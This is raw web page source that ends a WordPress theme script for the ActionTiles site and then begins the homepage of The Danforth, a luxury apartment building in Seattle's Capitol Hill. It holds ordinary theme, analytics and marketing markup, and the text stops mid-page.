/^#([\da-fA-F]{2})([\da-fA-F]{2})([\da-fA-F]{2})$/.exec(originalColor)) { $form.css('background-color', "rgba(" + parseInt(matches[1], 16) + "," + parseInt(matches[2], 16) + "," + parseInt(matches[3], 16) + ", " + overlayOpacity + ")"); } // Fault tolerance else { $form.css('background-color', originalColor); } $overlay.addClass('mobilefocus'); }) .on('blur', function(){ $overlay.removeClass('mobilefocus'); $form.css('background-color', 'transparent'); }); } $btnOpen.click(function(){ $container.addClass('active'); if (isFullScreen) { var searchPos = $btnOpen.offset(), searchWidth = $btnOpen.width(), searchHeight = $btnOpen.height(); // Preserving scroll position searchPos.top -= $window.scrollTop(); searchPos.left -= $window.scrollLeft(); var overlayX = searchPos.left + searchWidth / 2, overlayY = searchPos.top + searchHeight / 2, winWidth = $us.canvas.winWidth, winHeight = $us.canvas.winHeight, // Counting distance to the nearest screen corner overlayRadius = Math.sqrt(Math.pow(Math.max(winWidth - overlayX, overlayX), 2) + Math.pow(Math.max(winHeight - overlayY, overlayY), 2)), overlayScale = (overlayRadius + 15) / searchOverlayInitRadius; $overlay.css({ width: searchOverlayInitRadius * 2, height: searchOverlayInitRadius * 2, left: overlayX, top: overlayY, "margin-left": -searchOverlayInitRadius, "margin-top": -searchOverlayInitRadius }); $overlay .removeClass('overlay-out') .show(); $form.css({ opacity: 0, display: 'block', '-webkit-transition': 'opacity 0.4s 0.3s', transition: 'opacity 0.4s 0.3s' }); window.setTimeout(function(){ $overlay .addClass('overlay-on') .css({ "-webkit-transform": "scale(" + overlayScale + ")", "transform": "scale(" + overlayScale + ")" }); $form.css('opacity', 1); clearInterval(showHideTimer); showHideTimer = window.setTimeout(function(){ $input.focus(); }, 700); }, 25); } else { showHideTimer = window.setTimeout(function(){ $input.focus(); }, 700); } }); $input.keyup(function(e){ if (e.keyCode == 27) searchHide(); }); $btnClose.on('click touchstart', searchHide); }); }; $(function(){ jQuery('.l-header .w-search').wSearch(); }); }(jQuery); // w-tabs !function($){ // Extending some of the methods for material design animations $us.WTabs.prototype._init = $us.WTabs.prototype.init; $us.WTabs.prototype.init = function(container, options){ this.$tabsBar = $(); this.curTabWidth = 0; this.tabHeights = []; this.tabTops = []; this._init(container, options); }; $us.WTabs.prototype._cleanUpLayout = $us.WTabs.prototype.cleanUpLayout; $us.WTabs.prototype.cleanUpLayout = function(from){ this._cleanUpLayout(from); if (from == 'default' || from == 'ver') { this.$tabsBar.remove(); } }; $us.WTabs.prototype._prepareLayout = $us.WTabs.prototype.prepareLayout; $us.WTabs.prototype.prepareLayout = function(to){ this._prepareLayout(to); if (to == 'default' || to == 'ver') { this.$tabsBar = $('<div class="w-tabs-list-bar"></div>').appendTo(this.$tabsList); } }; $us.WTabs.prototype._measure = $us.WTabs.prototype.measure; $us.WTabs.prototype.measure = function(){ this._measure(); if (this.basicLayout == 'default') { this.minWidth = Math.max.apply(this, this.tabWidths) * this.count; this.curTabWidth = this.tabs[0].outerWidth(true); } else if (this.basicLayout == 'ver') { this.tabHeights = []; for (var index = 0; index < this.tabs.length; index++) { this.tabHeights.push(this.tabs[index].outerHeight(true)); this.tabTops.push(index ? (this.tabTops[index - 1] + this.tabHeights[index - 1]) : 0); } } }; // Counts bar position for certain element index and current layout $us.WTabs.prototype.barPosition = function(index){ if (this.curLayout == 'default') { var barStartOffset = this.curTabWidth * index, barEndOffset = this.curTabWidth * (this.count - index - 1); return { left: this.isRtl ? barEndOffset : barStartOffset, right: this.isRtl ? barStartOffset : barEndOffset }; } else if (this.curLayout == 'ver') { return { top: this.tabTops[index], height: this.tabHeights[index] }; } else { return {}; } }; $us.WTabs.prototype._openSection = $us.WTabs.prototype.openSection; $us.WTabs.prototype.openSection = function(index){ this._openSection(index); if (this.curLayout == 'default' || this.curLayout == 'ver' || this.curLayout == 'modern' || this.curLayout == 'trendy') { this.$tabsBar.performCSSTransition(this.barPosition(index), this.options.duration, null, this.options.easing); } }; $us.WTabs.prototype._resize = $us.WTabs.prototype.resize; $us.WTabs.prototype.resize = function(){ this._resize(); if (this.curLayout == 'default' || this.curLayout == 'ver' || this.curLayout == 'modern' || this.curLayout == 'trendy') { this.$tabsBar.css(this.barPosition(this.active[0]), this.options.duration, null, this.options.easing); } }; jQuery('.w-tabs').wTabs(); }(jQuery); // w-blog !function($){ // TODO Make proper reveal grid animation for "load more" $us.WBlog.prototype.beforeAppendItems = function($items){ //this.$list.addClass('animate_revealgrid'); //$items.addClass('animate_reveal'); }; $us.WBlog.prototype.afterAppendItems = function($items){ //$items.revealGridMD(); }; $(function(){ $('.w-blog').wBlog(); }); }(jQuery); // w-portfolio jQuery(function($){ // TODO Make proper reveal grid animation for "load more" $us.WPortfolio.prototype.itemLoaded = function(itemID){ if (this.$container.hasClass('animate_revealgrid')) { this.items[itemID].usMod('animate', false).css('opacity', 0); } }; $us.WPortfolio.prototype.itemsLoaded = function($items){ if (this.$container.hasClass('animate_revealgrid')) { $items.revealGridMD(); } }; $('.w-portfolio').wPortfolio(); }); // Fixing contact form 7 semantics, when requested jQuery('.wpcf7').each(function(){ var $form = jQuery(this); // Removing wrong newlines $form.find('br').remove(); // Fixing quiz layout $form.find('.w-form-row .wpcf7-quiz').each(function(){ var $input = jQuery(this), $row = $input.closest('.w-form-row'), $field = $row.find('.w-form-row-field:first'), $label = $row.find('.wpcf7-quiz-label'); $label.insertBefore($field).attr('class', 'w-form-row-label'); $input.unwrap(); }); // Removing excess wrappers $form.find('.w-form-row-field > .wpcf7-form-control-wrap > .wpcf7-form-control').each(function(){ var $input = jQuery(this); if (($input.attr('type') || '').match(/^(text|email|url|tel|number|date|quiz|captcha)$/) || $input.is('textarea')) { // Moving wrapper classes to .w-form-field, and removing the span wrapper var wrapperClasses = $input.parent().get(0).className; $input.unwrap(); $input.parent().get(0).className += ' ' + wrapperClasses; } }); // Transforming submit button $form.find('.w-form-row-field > .wpcf7-submit').each(function(){ var $input = jQuery(this), classes = $input.attr('class').split(' '), value = $input.attr('value') || ''; $input.siblings('p').remove(); if (jQuery.inArray('w-btn', classes) == -1) { classes.push('w-btn'); } var buttonHtml = '<button id="message_send" class="' + classes.join(' ') + '">' + '<div class="g-preloader"></div>' + '<span class="w-btn-label">' + value + '</span>' + '<span class="ripple-container"></span>' + '</button>'; $input.replaceWith(buttonHtml); }); // Adjusting proper wrapper for select controller $form.find('.wpcf7-form-control-wrap > select').each(function(){ var $select = jQuery(this); if (!$select.attr('multiple')) $select.parent().addClass('type_select'); }); jQuery('<span class="w-form-row-field-bar"></span>').appendTo($form.find('.wpcf7-form-control-wrap')); $form.on('mailsent.wpcf7', function(){ $form.find('.w-form-row.not-empty').removeClass('not-empty'); }); }); // Zephyr special Material Design animations jQuery(function($){ "use strict"; /** * Material Design Ripples */ var $body = document.body || document.documentElement, $bodyStyle = $body.style, isTransitionsSupported = $bodyStyle.transition !== undefined || $bodyStyle.WebkitTransition !== undefined; var removeRipple = function($ripple){ $ripple.off(); if (isTransitionsSupported) { $ripple.addClass("ripple-out"); } else { $ripple.animate({ "opacity": 0 }, 100, function(){ $ripple.trigger("transitionend"); }); } $ripple.on("transitionend webkitTransitionEnd oTransitionEnd MSTransitionEnd", function(){ $ripple.remove(); }); }; $.fn.mdRipple = function(){ return this.each(function(){ var $element = $(this), $container, containerOffset, startTimer = null; if (!$element.find('.ripple-container').length) { $element.append('<span class="ripple-container"></span>'); } $container = $element.find(".ripple-container"); // Storing last touch event for touchEnd coordinates var lastTouch = null; if ($.isMobile) { $element.on('touchstart touchmove', function(e){ e = e.originalEvent; if (e.touches.length === 1) { lastTouch = e.touches[0]; } }); } $element.on($.isMobile ? 'touchend' : 'mouseup', function(e){ var offsetLeft, offsetTop, offsetRight, $ripple = $('<span class="ripple"></span>'), rippleSize = Math.max($element.outerWidth(), $element.outerHeight()) / Math.max(20, $ripple.outerWidth()) * 2.5; containerOffset = $container.offset(); // get pointer position if (!$.isMobile) { offsetLeft = e.pageX - containerOffset.left; offsetTop = e.pageY - containerOffset.top; } else if (lastTouch !== null) { offsetLeft = lastTouch.pageX - containerOffset.left; offsetTop = lastTouch.pageY - containerOffset.top; lastTouch = null; } else { return; } if ($('body').hasClass('rtl')) { offsetRight = $container.width() - offsetLeft; $ripple.css({right: offsetRight, top: offsetTop}); } else { $ripple.css({left: offsetLeft, top: offsetTop}); } (function(){ return window.getComputedStyle($ripple[0]).opacity; })(); $container.append($ripple); startTimer = setTimeout(function(){ $ripple.css({ "-webkit-transform": "scale(" + rippleSize + ")", "transform": "scale(" + rippleSize + ")" }); $ripple.addClass('ripple-on'); $ripple.data('animating', 'on'); $ripple.data('mousedown', 'on'); }, 25); setTimeout(function(){ $ripple.data('animating', 'off'); removeRipple($ripple); }, 700); }); }); }; // Initialize MD Ripples jQuery('.w-btn, .w-nav-anchor, .w-portfolio-item-anchor, .w-tabs-item, .w-gallery-item, .g-filters-item, a > .w-blog-post-preview, .w-person.layout_card .w-person-image a, .w-iconbox.style_circle a .w-iconbox-icon, .cl-btn').mdRipple(); /** * Material Design Reveal Grid: Show grid items with hierarchical timing * @param {Function} onFinish Function to call when the overall grid is revealed */ $.fn.revealGridMD = function(onFinish){ var items = $(this), shown = false, isRTL = $('.l-body').hasClass('rtl'); if (items.length == 0) return; var countSz = function(){ // The vector between the first item and the opposite x/y var mx = isRTL ? 100000 : 0, my = 0; // Retrieving items positions var sz = items.map(function(){ var $this = jQuery(this), pos = $this.position(); pos.width = $this.width(); pos.height = $this.height(); // Center point pos.cx = pos.left + parseInt(pos.width / 2); pos.cy = pos.top + parseInt(pos.height / 2); mx = Math[isRTL ? 'min' : 'max'](mx, pos.cx); my = Math.max(my, pos.cy); return pos; }); var wx = mx - sz[0].cx, wy = my - sz[0].cy, wlen = Math.abs(wx * wx + wy * wy); // Counting projection lengths for (var i = 0; i < sz.length; i++) { // Counting vector to this item var vx = sz[i].cx - sz[0].cx, vy = sz[i].cy - sz[0].cy; sz[i].delta = (vx * wx + vy * wy) / wlen; } return sz; }; var sz = countSz(); items.css('opacity', 0).each(function(i, item){ var $item = $(item); $item.performCSSTransition({ opacity: 1 }, 400, function(){ $item.removeClass('animate_reveal'); if (onFinish && typeof onFinish == 'function' && i == items.length - 1) onFinish(); }, null, 750 * sz[i].delta); }); }; $('.animate_revealgrid').each(function(){ $us.scroll.addWaypoint($(this), '15%', function($elm){ var $items = $elm.find('.animate_reveal'); if ($us.$body.hasClass('disable_effects')) return $items.removeClass('animate_reveal'); $items.revealGridMD(function(){ // Compatibility with isotope if (!$.fn.isotope) return; var isotope = $items.parent().data('isotope'); if (isotope) { $.each(isotope.items, function(index, item){ item.disableTransition(); }); } }); }); }); }); </script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'119525573',post:'5377',tz:'-7',srv:'www.actiontiles.com'} ]); _stq.push([ 'clickTrackerInit', '119525573', '5377' ]); </script> <div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use <a href="https://www.actiontiles.com/cookies/" target="_blank">cookies</a> to ensure that we give you the best experience on our websites. If you continue to use this site you consent to the use of cookies, our <a href="https://www.actiontiles.com/privacy/" target="_blank">Privacy Policy</a>, and our <a href="https://www.actiontiles.com/terms/" target="_blank">Terms of Service</a>.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a> </div> </div></body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 52/127 objects using disk Page Caching using disk: enhanced Minified using disk Database Caching 5/73 queries in 0.039 seconds using disk (Request-wide modification query) Served from: www.actiontiles.com @ 2019-05-16 07:48:14 by W3 Total Cache -->
0
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/favicon-144.png" /> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/favicon-114.png" /> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/favicon-72.png"> <link rel='shortcut icon' type='image/x-icon' href="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/favicon-32.png" /> <meta name="author" content="DEI Creative in Seattle, WA" /> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="robots" content="all" /> <!-- Tablet/Mobile --> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Home - The Danforth Seattle - Luxury Capitol Hill Apartments Above Whole Foods</title> <link rel="pingback" href="http://www.thedanforthseattle.com/xmlrpc.php" /> <script type="text/javascript"> var theme = 'http://www.thedanforthseattle.com/wp-content/themes/danforth', rent_minumum = 2095, rent_maximum = 10340; </script> <!-- This site is optimized with the Yoast SEO Premium plugin v7.8.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="New high-rise apartment homes in Capitol Hill near Downtown Seattle, First Hill and Seattle University. The pet-friendly studios, 1-bedroom, 2-bedroom and penthouse apartments at the intersection of Broadway and Madison feature rooftop amenities, fitness center, dog wash, demonstration kitchen and electric vehicle parking."/> <link rel="canonical" href="http://www.thedanforthseattle.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - The Danforth Seattle - Luxury Capitol Hill Apartments Above Whole Foods" /> <meta property="og:description" content="New high-rise apartment homes in Capitol Hill near Downtown Seattle, First Hill and Seattle University. The pet-friendly studios, 1-bedroom, 2-bedroom and penthouse apartments at the intersection of Broadway and Madison feature rooftop amenities, fitness center, dog wash, demonstration kitchen and electric vehicle parking." /> <meta property="og:url" content="http://www.thedanforthseattle.com/" /> <meta property="og:site_name" content="Danforth" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="New high-rise apartment homes in Capitol Hill near Downtown Seattle, First Hill and Seattle University. The pet-friendly studios, 1-bedroom, 2-bedroom and penthouse apartments at the intersection of Broadway and Madison feature rooftop amenities, fitness center, dog wash, demonstration kitchen and electric vehicle parking." /> <meta name="twitter:title" content="Home - The Danforth Seattle - Luxury Capitol Hill Apartments Above Whole Foods" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.thedanforthseattle.com\/","name":"Danforth","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.thedanforthseattle.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//code.jquery.com' /> <link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.thedanforthseattle.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='stylesheet-main-css' href='http://www.thedanforthseattle.com/wp-content/themes/danforth/style.css?ver=4.9.10' type='text/css' media='' /> <script type='text/javascript' src='http://code.jquery.com/jquery-latest.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?v=3.exp&#038;key=AIzaSyD88U0r_2iwFkgR6ZHTI1Rw72OG_FTU1mQ&#038;sensor=false&#038;ver=4.9.10'></script> <link rel='https://api.w.org/' href='http://www.thedanforthseattle.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.thedanforthseattle.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.thedanforthseattle.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='http://www.thedanforthseattle.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.thedanforthseattle.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thedanforthseattle.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.thedanforthseattle.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thedanforthseattle.com%2F&#038;format=xml" /> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"> <!-- BEGIN Typekit Fonts for WordPress --> <link rel="stylesheet" href="https://use.typekit.net/tlm1uii.css"> <!-- END Typekit Fonts for WordPress --> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-115870918-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-115870918-1'); </script> <script src='https://www.google.com/recaptcha/api.js?render=6LeJPX8UAAAAAKP85tPuIBkXd-cFR3xRUrOxGgMN'></script> <script> grecaptcha.ready(function() { grecaptcha.execute('6LeJPX8UAAAAAKP85tPuIBkXd-cFR3xRUrOxGgMN', {action: 'contact_form'}).then(function(token) { $('<input>').attr({ type: 'hidden', name: 'g-recaptcha-response', value: token }).prependTo('.map-contact-form form') }); }); </script> </head> <body class="home page-template-default page page-id-8"> <header> <div class="wrapper large"> <a href="http://www.thedanforthseattle.com" class="logo image"> <svg xmlns="http://www.w3.org/2000/svg" width="250px" height="139px" viewBox="0 0 250 139"><path fill="#3B4444" d="M12.3,135.8c6.8,0,11.6-4.7,11.6-11.3c0-6.3-4.8-10.9-11.6-10.9H5.5v22.1H12.3L12.3,135.8z M12.3,111 c8.6,0,14.6,5.6,14.6,13.5c0,8.2-6,13.9-14.6,13.9H2.7V111H12.3L12.3,111z M45.5,114.2l6.1,13.6H39.5L45.5,114.2L45.5,114.2z M44.2,110.8l-12.6,27.6h3.1l3.6-8h14.5l3.6,8h3.1l-12.6-27.6H44.2L44.2,110.8z M88.3,111h2.9v27.4h-2.5l-18.1-22.2v22.2h-2.9V111 h2.4l18.1,22.5V111L88.3,111z M102.2,111h18.9v2.6h-16v10.5h14.3v2.7h-14.3v11.6h-2.9V111L102.2,111z M154.8,124.7 c0-6.4-5-11.6-11.5-11.6c-6.4,0-11.5,5.2-11.5,11.6c0,6.4,5,11.6,11.5,11.6C149.8,136.3,154.8,131.1,154.8,124.7 M157.7,124.7 c0,7.9-6.4,14.3-14.4,14.3c-8,0-14.4-6.4-14.4-14.3c0-7.9,6.4-14.3,14.4-14.3C151.3,110.5,157.7,116.8,157.7,124.7 M178,125.8 c4.5,0,7.7-2.3,7.7-6.1c0-3.8-3.2-6.1-7.7-6.1h-7.3v12.2H178L178,125.8z M170.7,128.5v9.9h-2.9V111h10.3c6.2,0,10.5,3.3,10.5,8.7 c0,4.5-3,7.6-7.6,8.5l8.9,10.2h-3.6l-8.7-9.9H170.7L170.7,128.5z M195.2,111h23.5v2.6h-10.3v24.8h-2.9v-24.8h-10.3V111L195.2,111z M247.1,111h2.9v27.4h-2.9v-12.2h-16.7v12.2h-2.9V111h2.9v12.5h16.7V111L247.1,111z M0,95.8h8.2v0.9H4.6v8.7h-1v-8.7H0V95.8L0,95.8 z M19.1,105.4h-1v-4.3h-5.8v4.3h-1v-9.6h1v4.4h5.8v-4.4h1V105.4L19.1,105.4z M24.3,100.1h5.1v0.9h-5.1v3.4H30v0.9h-6.7v-9.6H30v0.9 h-5.7V100.1L24.3,100.1z"/><path fill="#567D96" d="M102.2,11.6v65.7c0,0,23.5,9.9,23.8,9.9c0.6,0.1,1.2,0.2,1.9,0.2c3.2,0,7-1.9,8.1-9.2l0,0 c0.1-0.5,0.1-1,0.1-1.5V32.1c0-5.8-4.8-8.1-10.7-10.6L102.2,11.6L102.2,11.6z M104.4,15l20.1,8.6c6.4,2.7,9.3,4.4,9.3,8.6v44.5 c0,0.3,0,0.7-0.1,1.2l-0.1,0.8c-0.8,4.4-2.7,6.6-5.7,6.6c-0.4,0-0.8,0-1.3-0.1c-1.5-0.6-13.5-5.6-22.2-9.2V15L104.4,15z M110.2,5.8 v65.7c0,0,23.5,9.9,23.8,9.9c0.6,0.1,1.2,0.2,1.8,0.2c3.2,0,7-1.9,8.1-9.2l0,0c0.1-0.5,0.1-1,0.1-1.5V26.3c0-5.8-4.8-8.1-10.7-10.6 L110.2,5.8L110.2,5.8z M112.5,9.2l20.1,8.6c6.4,2.7,9.3,4.4,9.3,8.6v44.5c0,0.3,0,0.7-0.1,1.2l-0.1,0.9c-0.8,4.3-2.7,6.5-5.7,6.5 c-0.4,0-0.8,0-1.3-0.1c-1.5-0.6-13.5-5.6-22.2-9.2V9.2L112.5,9.2z M118.3,0v65.7c0,0,23.5,9.9,23.8,9.9c0.6,0.1,1.2,0.2,1.9,0.2 c3.2,0,7-1.9,8.1-9.2h0c0.1-0.5,0.1-1,0.1-1.5V20.5c0-5.8-4.8-8.1-10.7-10.6L118.3,0L118.3,0z M120.5,3.3l20.1,8.6 c6.3,2.7,9.3,4.4,9.3,8.6V65c0,0.3,0,0.7-0.1,1.2l-0.1,0.6c-0.8,4.5-2.7,6.7-5.8,6.7c-0.4,0-0.8,0-1.3-0.1 c-1.5-0.6-13.5-5.6-22.2-9.2V3.3L120.5,3.3z"/></svg> <img src="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/logo-horizontal.png" alt="Danforth" /> </a> <a href="#" class="hamburger"> <span class="line first"></span> <span class="line second"></span> <span class="line third"></span> <span class="line fourth"></span> </a> <!-- <a href="http://www.thedanforthseattle.com/?page_id=2734" class="button">Enter to win the Experience Danforth Contest - Learn More</a> --> <ul class="navigation top center"> <li id="menu-item-32" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32"><a target="_blank" href="https://6587416.onlineleasing.realpage.com">Reserve</a></li> <li id="menu-item-4016" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4016"><a href="http://www.thedanforthseattle.com/contact/">Contact</a></li> <li class="callout"><a href="http://www.thedanforthseattle.com/contact/">Free Rent until July! <small>(Terms apply)</small></a></li> </ul> </div> <ul class="navigation bottom center"> <li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a href="http://www.thedanforthseattle.com/homes/">The Homes</a></li> <li id="menu-item-4017" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4017"><a href="http://www.thedanforthseattle.com/penthouses/">Penthouses</a></li> <li id="menu-item-29" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29"><a href="http://www.thedanforthseattle.com/floor-plans/">Floor Plans</a></li> <li id="menu-item-28" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28"><a href="http://www.thedanforthseattle.com/amenities/">Amenities</a></li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="http://www.thedanforthseattle.com/location/">Location</a></li> <li id="menu-item-25" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25"><a href="http://www.thedanforthseattle.com/gallery/">Gallery</a></li> <li id="menu-item-4009" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4009"><a target="_blank" href="http://helixmedia360.com/Greystar/The.Danforth.html">Virtual Tour</a></li> <li id="menu-item-4020" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4020"><a href="https://6587416.onlineleasing.realpage.com/">Reserve</a></li> <li id="menu-item-4021" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4021"><a href="http://www.thedanforthseattle.com/contact/">Contact</a></li> </ul> </header> <div id="fixed-header"> <ul class="navigation bottom center"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a href="http://www.thedanforthseattle.com/homes/">The Homes</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4017"><a href="http://www.thedanforthseattle.com/penthouses/">Penthouses</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29"><a href="http://www.thedanforthseattle.com/floor-plans/">Floor Plans</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28"><a href="http://www.thedanforthseattle.com/amenities/">Amenities</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="http://www.thedanforthseattle.com/location/">Location</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25"><a href="http://www.thedanforthseattle.com/gallery/">Gallery</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4009"><a target="_blank" href="http://helixmedia360.com/Greystar/The.Danforth.html">Virtual Tour</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4020"><a href="https://6587416.onlineleasing.realpage.com/">Reserve</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4021"><a href="http://www.thedanforthseattle.com/contact/">Contact</a></li> </ul> </div> <main> <section class="video-section right-alignment"> <div class="columns clear"> <div class="column left width-55"> <div class="inside match-height"> <video autoplay loop muted preload="auto"> <source src="http://www.thedanforthseattle.com/wp-content/uploads/2018/03/INTRO_WEB_01_3.mp4" type="video/mp4"> </video> <div class="gradient"></div> </div> </div> <div class="column left width-45"> <div class="inside match-height"> <div class="content"> <div class="reveal"> <h1>Live where you love to be</h1> <p>New apartments atop Whole Foods now open.</p> <p><a class="button" href="http://www.thedanforthseattle.com/v2/contact/">Schedule a tour</a></p> <p><a class="button" href="https://www.youtube.com/embed/CXVz2hq6LY0?rel=0&amp;amp;showinfo=0">Watch the Full Video</a></p> </div> </div> </div> </div> </div> <div class="logo" data-bottom-top="background-position-y: -25%;" data-top-bottom="background-position-y: 125%;"></div> </section> <section class="photo-text-section background-white left-overlay-alignment enable-parallax"> <div class="text"> <div class="wrapper large clear"> <div class="content center reveal"> <h1>Where life and living intersect</h1> <p><span style="font-weight: 400;">The Danforth homes were designed from the character of our immediate neighborhood.  This 16-story tower anchors Capitol Hill, First Hill and Seattle University at the notable intersection of Broadway &amp; Madison.</span></p> <p><a class="button" href="http://www.thedanforthseattle.com/v2/homes/">See Homes</a></p> </div> </div> </div> <div class="background" style="background-image: url(http://www.thedanforthseattle.com/wp-content/uploads/2018/01/IMG_6292.jpg);" data-bottom-top="top: -35%; bottom: 0%;" data-top-bottom="top: 0%; bottom: -35%;"></div> </section> <section class="video-section left-alignment"> <div class="columns clear"> <div class="column left width-45"> <div class="inside match-height"> <div class="content"> <div class="reveal"> <h1>Modern Hot spots with Capitol Hill Style</h1> <p><span style="font-weight: 400;">Capitol Hill gives unique character to the contemporary, resulting in unforgettable destinations and memorable experiences.</span></p> <p><a class="button" href="http://www.thedanforthseattle.com/v2/location/">Explore The Hill</a></p> </div> </div> </div> </div> <div class="column left width-55"> <div class="inside match-height"> <video autoplay loop muted preload="auto"> <source src="http://www.thedanforthseattle.com/wp-content/uploads/2018/03/CAPHILL_WEB_01_1.mp4" type="video/mp4"> </video> <div class="gradient"></div> </div> </div> </div> <div class="logo" data-bottom-top="background-position-y: -25%;" data-top-bottom="background-position-y: 125%;"></div> </section> <section class="photo-text-section background-white right-overlay-alignment enable-parallax"> <div class="text"> <div class="wrapper large clear"> <div class="content center reveal"> <h1>Intellectual and street smart, located between Seattle U and downtown</h1> <p><span style="font-weight: 400;">At the intersection of what is now and what’s next.  Seattle University sets the tone for the future, while the Danforth embraces today’s opportunities.</span></p> <p><a class="button" href="http://www.thedanforthseattle.com/v2/location/">Learn More</a></p> </div> </div> </div> <div class="background" style="background-image: url(http://www.thedanforthseattle.com/wp-content/uploads/2018/01/TheDanforth-201710_0191.jpg);" data-bottom-top="top: -35%; bottom: 